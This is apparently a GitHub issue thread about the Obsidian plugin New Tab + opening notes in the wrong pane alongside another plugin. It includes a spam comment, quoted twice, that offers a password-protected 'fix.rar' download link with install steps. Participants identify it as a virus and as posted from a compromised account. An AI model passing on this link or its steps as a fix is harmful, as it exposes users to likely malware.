### ISSUE TITLE
Note opens in the Left Pane

### ISSUE THREAD

**Issue by pablo-hp** [Raphlette/obsidian-new-tab-plus#8]
I have installed the File Tree Alternative plugin.
I noticed that some bugs occur when using the plugin, together with New Tab +.
Sometimes, for some reason that I can't say, instead of the note opening in the tabs on the right side, the note opens on the left side, where we have the folders, recents and other resources.

**Comment by Saschl** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by pablo-hp** [comment]
> Download https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file password: changeme In the installer menu, select "gcc."

and who are you?
And this virus here?
lol

**Comment by Saschl** [comment]
> > Download https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file password: changeme In the installer menu, select "gcc."
> 
> and who are you? And this virus here? lol



> > Download https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file password: changeme In the installer menu, select "gcc."
> 
> and who are you? And this virus here? lol

Really sorry about that, my account got compromised. I’m cleaning up right now, do not click on this link

**Comment by Raphlette** [comment]
Hi @pablo-hp, sorry to hear about that,

On a previous issue (#3), I decided to not provide support on non-standard features coming from other plugins as it is not really realistic. It would require me to not only comply with Obsidian internal structure but also with new logics given by said features. Doing so would create way too much variables and use cases for me to take in account.

I'll still have a look into it, just in case I find a solution to cover more use cases of the New Tab + in general, but I can't promise anything though. Will keep you posted.

**Comment by pablo-hp** [comment]
ok, thanks

**Comment by Raphlette** [comment]
Hey @pablo-hp,
I just had a look at the issue again as I was wrapping up the latest version of the plugin.
New Tab + is more stable now, and when I tried with File Tree Alternative plugin on it seemed to work well together.
Just little FYI, if you are still using both plugin, here it is :)
